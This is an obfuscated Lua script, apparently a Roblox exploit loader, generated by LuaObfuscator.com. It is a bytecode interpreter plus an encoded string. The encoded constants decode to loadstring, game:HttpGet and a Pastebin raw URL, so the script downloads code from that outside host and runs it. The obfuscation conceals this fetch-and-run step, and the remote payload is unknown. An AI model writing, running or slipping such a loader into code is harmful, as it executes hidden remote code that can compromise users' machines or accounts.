--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.9) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then local v89=0;while true do if (v89==0) then v19=v0(v3(v30,1,1));return "";end end else local v90=v2(v0(v30,16));if v19 then local v113=0;local v114;while true do if (v113==0) then v114=v5(v90,v19);v19=nil;v113=1;end if (v113==1) then return v114;end end else return v90;end end end);local function v20(v31,v32,v33) if v33 then local v91=(v31/((5 -3)^(v32-(2 -1))))%(((1640 -(1523 + 114)) -1)^(((v33-1) -(v32-(2 -1))) + (620 -(555 + 64)))) ;return v91-(v91%(932 -(857 + 74))) ;else local v92=568 -(367 + 201) ;local v93;while true do if (v92==(927 -(214 + 641 + 72))) then v93=(1 + 1)^(v32-(1 + 0)) ;return (((v31%(v93 + v93))>=v93) and (878 -(282 + 595))) or (0 -0) ;end end end end local function v21() local v34=1065 -(68 + 978 + 19) ;local v35;while true do if (v34==1) then return v35;end if (v34==(1270 -(226 + 1044))) then v35=v1(v16,v18,v18);v18=v18 + (4 -3) ;v34=118 -(32 + 85) ;end end end local function v22() local v36=0 + 0 ;local v37;local v38;while true do if (v36==(958 -(892 + (245 -(67 + 113))))) then return (v38 * (610 -354)) + v37 ;end if (v36==0) then v37,v38=v1(v16,v18,v18 + (3 -1) );v18=v18 + ((3 + 0) -1) ;v36=351 -(87 + 263) ;end end end local function v23() local v39=0 -0 ;local v40;local v41;local v42;local v43;while true do if (v39==(1 + 0)) then return (v43 * 16777216) + (v42 * (260471 -194935)) + (v41 * (1208 -((1799 -(915 + 82)) + 150))) + v40 ;end if (v39==(0 -0)) then v40,v41,v42,v43=v1(v16,v18,v18 + (5 -(5 -3)) );v18=v18 + 3 + 1 ;v39=1;end end end local function v24() local v44=0 + 0 ;local v45;local v46;local v47;local v48;local v49;local v50;while true do if (v44==(0 -0)) then v45=v23();v46=v23();v44=1;end if (v44==(1189 -(1069 + 118))) then v49=v20(v46,47 -26 ,110 -79 );v50=((v20(v46,69 -37 )==(1 + 0)) and  -1) or (1 -0) ;v44=3 + 0 ;end if (v44==(794 -(368 + 423))) then if (v49==((859 -(814 + 45)) -(0 -0))) then if (v48==(18 -(10 + 8))) then return v50 * (0 -0) ;else v49=1;v47=442 -(416 + 26) ;end elseif (v49==(6535 -4488)) then return ((v48==(0 + 0)) and (v50 * ((1 -(0 + 0))/(438 -(145 + 104 + 189))))) or (v50 * NaN) ;end return v8(v50,v49-1023 ) * (v47 + (v48/(((1577 -1145) -(44 + 386))^(1538 -(998 + 488))))) ;end if (v44==(1 + 0)) then v47=1 + 0 ;v48=(v20(v46,773 -(201 + 571) ,1158 -(116 + 1022) ) * ((8 -6)^32)) + v45 ;v44=2 + 0 ;end end end local function v25(v51) local v52;if  not v51 then local v94=1080 -(1020 + 60) ;while true do if (v94==(885 -(261 + 624))) then v51=v23();if (v51==0) then return "";end break;end end end v52=v3(v16,v18,(v18 + v51) -1 );v18=v18 + v51 ;local v53={};for v69=1 -0 , #v52 do v53[v69]=v2(v1(v3(v52,v69,v69)));end return v6(v53);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v54=(function() return function(v95,v96,v97,v98,v99,v100,v101,v102) local v95=(function() return 0;end)();local v96=(function() return;end)();local v97=(function() return;end)();while true do if (v95~= #"}") then else if (v96== #"}") then v97=(function() return v98()~=(0 + 0) ;end)();elseif (v96==(4 -2)) then v97=(function() return v99();end)();elseif (v96== #"19(") then v97=(function() return v100();end)();end v101[v102]=(function() return v97;end)();break;end if ((1335 -(178 + 1157))~=v95) then else local v120=(function() return 0;end)();local v121=(function() return;end)();while true do if (v120==(0 + 0)) then v121=(function() return 867 -(550 + 317) ;end)();while true do if (v121==(1 -0)) then v95=(function() return  #"}";end)();break;end if ((1262 -(1091 + 171))~=v121) then else v96=(function() return v98();end)();v97=(function() return nil;end)();v121=(function() return 2 -1 ;end)();end end break;end end end end return v95,v96,v97,v98,v99,v100,v101,v102;end;end)();local v55=(function() return function(v103,v104,v105) local v106=(function() return 285 -(134 + 151) ;end)();while true do if (v106~=(1665 -(970 + 695))) then else local v122=(function() return 0;end)();while true do if ((0 -0)~=v122) then else v103[v104-#"," ]=(function() return v105();end)();return v103,v104,v105;end end end end end;end)();local v56=(function() return {};end)();local v57=(function() return {};end)();local v58=(function() return {};end)();local v59=(function() return {v56,v57,nil,v58};end)();local v60=(function() return v23();end)();local v61=(function() return {};end)();for v71= #",",v60 do FlatIdent_31905,Type,Cons,v21,v24,v25,v61,v71=(function() return v54(FlatIdent_31905,Type,Cons,v21,v24,v25,v61,v71);end)();end v59[ #"xnx"]=(function() return v21();end)();for v72= #"/",v23() do local v73=(function() return v21();end)();if (v20(v73, #"}", #",")~=(0 -0)) then else local v109=(function() return 0;end)();local v110=(function() return;end)();local v111=(function() return;end)();local v112=(function() return;end)();while true do if (v109~=(6 -4)) then else if (v20(v111, #"}", #"/")== #"[") then v112[1992 -(582 + 1408) ]=(function() return v61[v112[2]];end)();end if (v20(v111,2,376 -(123 + 251) )== #"<") then v112[ #"-19"]=(function() return v61[v112[ #"xxx"]];end)();end v109=(function() return 10 -7 ;end)();end if (v109~=(4 -3)) then else local v125=(function() return 698 -(208 + 490) ;end)();while true do if (v125~=(0 + 0)) then else v112=(function() return {v22(),v22(),nil,nil};end)();if (v110==(0 + 0)) then local v132=(function() return 836 -(660 + 176) ;end)();local v133=(function() return;end)();while true do if ((0 + 0)~=v132) then else v133=(function() return 780 -(162 + 618) ;end)();while true do if (v133~=(202 -(14 + 188))) then else v112[ #"-19"]=(function() return v22();end)();v112[ #"?id="]=(function() return v22();end)();break;end end break;end end elseif (v110== #"\\") then v112[ #"-19"]=(function() return v23();end)();elseif (v110==(677 -(534 + 141))) then v112[ #"91("]=(function() return v23() -((1 + 1)^(26 -10)) ;end)();elseif (v110== #"xnx") then local v174=(function() return 0 + 0 ;end)();local v175=(function() return;end)();while true do if (v174~=0) then else v175=(function() return 1636 -(1373 + 263) ;end)();while true do if ((1000 -(451 + 549))==v175) then v112[ #"xxx"]=(function() return v23() -((1 + 1)^16) ;end)();v112[ #"asd1"]=(function() return v22();end)();break;end end break;end end end v125=(function() return 1 + 0 ;end)();end if (v125==(1 -0)) then v109=(function() return 3 -1 ;end)();break;end end end if (v109~=(4 -1)) then else if (v20(v111, #"gha", #"nil")~= #"<") then else v112[ #"http"]=(function() return v61[v112[ #"0836"]];end)();end v56[v72]=(function() return v112;end)();break;end if (v109~=(0 -0)) then else local v127=(function() return 0 + 0 ;end)();while true do if (v127==(0 + 0)) then v110=(function() return v20(v73,2, #"gha");end)();v111=(function() return v20(v73, #"0313",402 -(115 + 281) );end)();v127=(function() return 1 -0 ;end)();end if ((2 -1)==v127) then v109=(function() return 342 -(218 + 123) ;end)();break;end end end end end end for v74= #"[",v23() do v57,v74,v28=(function() return v55(v57,v74,v28);end)();end return v59;end local function v29(v63,v64,v65) local v66=v63[1582 -((4131 -2596) + 46) ];local v67=v63[2 + 0 ];local v68=v63[1 + 2 ];return function(...) local v75=v66;local v76=v67;local v77=v68;local v78=v27;local v79=561 -(306 + 254) ;local v80= -(1 + 0);local v81={};local v82={...};local v83=v12("#",...) -1 ;local v84={};local v85={};for v107=0,v83 do if (v107>=v77) then v81[v107-v77 ]=v82[v107 + (1468 -(899 + 568)) ];else v85[v107]=v82[v107 + 1 + 0 ];end end local v86=(v83-v77) + ((322 -(53 + 267)) -(1 + 0)) ;local v87;local v88;while true do local v108=603 -(268 + 335) ;while true do if ((v108==(291 -(60 + (643 -(15 + 398))))) or (1395==3578)) then if (v88<=(578 -(426 + 146))) then if (v88<=2) then if (v88<=(0 + 0)) then local v134=1456 -(282 + 1174) ;local v135;while true do if ((811 -(569 + 242))==v134) then v135=v87[5 -3 ];v85[v135]=v85[v135](v13(v85,v135 + 1 + (982 -(18 + 964)) ,v80));break;end end elseif (v88>(1025 -(706 + 318))) then v85[v87[(4716 -3463) -(721 + 530) ]]=v65[v87[3]];else v85[v87[1273 -(945 + 326) ]]();end elseif ((512<=3591) and (v88<=((6 + 3) -5))) then if (v88>3) then local v139=v87[2 + 0 ];local v140=v85[v87[703 -(271 + 271 + 158) ]];v85[v139 + 1 + 0 ]=v140;v85[v139]=v140[v87[1504 -(1408 + 92) ]];else local v144=1086 -(461 + 625) ;local v145;local v146;local v147;local v148;while true do if (v144==(1288 -(993 + 295))) then v145=v87[2];v146,v147=v78(v85[v145](v13(v85,v145 + 1 + 0 ,v87[1174 -(418 + 753) ])));v144=1;end if ((4795>402) and (v144==2)) then for v176=v145,v80 do local v177=0 + 0 ;while true do if ((0 + 0)==v177) then v148=v148 + (851 -(20 + 830)) + 0 + 0 ;v85[v176]=v146[v148];break;end end end break;end if (v144==((127 -(116 + 10)) + 0 + 0)) then v80=(v147 + v145) -1 ;v148=529 -(406 + 123) ;v144=1771 -(1749 + 20) ;end end end elseif (v88>(743 -(542 + 196))) then local v149=0 + 0 ;local v150;local v151;local v152;local v153;while true do if (1==v149) then v80=(v152 + v150) -(1323 -(1249 + (156 -83))) ;v153=0 + 0 ;v149=1147 -(466 + 679) ;end if ((4813>3565) and (v149==0)) then v150=v87[4 -2 ];v151,v152=v78(v85[v150](v13(v85,v150 + (2 -1) ,v87[3])));v149=1901 -(106 + 1794) ;end if ((3912==3912) and (v149==2)) then for v178=v150,v80 do local v179=0 + 0 ;while true do if ((0 + 0)==v179) then v153=v153 + 1 + 0 ;v85[v178]=v151[v153];break;end end end break;end end else v85[v87[(3 + 2) -3 ]]=v87[7 -4 ];end elseif (v88<=(123 -(4 + 110))) then if ((2821<=4824) and (v88<=((213 + 378) -(57 + 527)))) then do return;end elseif (v88>(1435 -(41 + 1386))) then local v156=v87[105 -(17 + (226 -140)) ];local v157=v85[v87[3 + (0 -0) ]];v85[v156 + (1 -0) ]=v157;v85[v156]=v157[v87[11 -7 ]];else v85[v87[2]]=v65[v87[169 -(122 + 44) ]];end elseif ((1738<=2195) and (v88<=(18 -7))) then if ((41<=3018) and (v88==(33 -23))) then local v163=v87[2 + 0 ];v85[v163]=v85[v163](v13(v85,v163 + 1 + 0 ,v80));else v85[v87[3 -1 ]]();end elseif (v88>(77 -((1581 -(1126 + 425)) + 35))) then do return;end else v85[v87[(407 -(118 + 287)) + 0 ]]=v87[1260 -(1043 + 214) ];end v79=v79 + 1 ;break;end if (v108==0) then v87=v75[v79];v88=v87[3 -2 ];v108=1213 -(323 + 889) ;end end end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403213Q00682Q7470733A2Q2F706173746562696E2E636F6D2F7261772F356D52746476467000083Q0012023Q00013Q001202000100023Q00200900010001000300120C000300044Q0003000100034Q000A5Q00022Q000B3Q000100012Q00073Q00017Q00",v9(),...);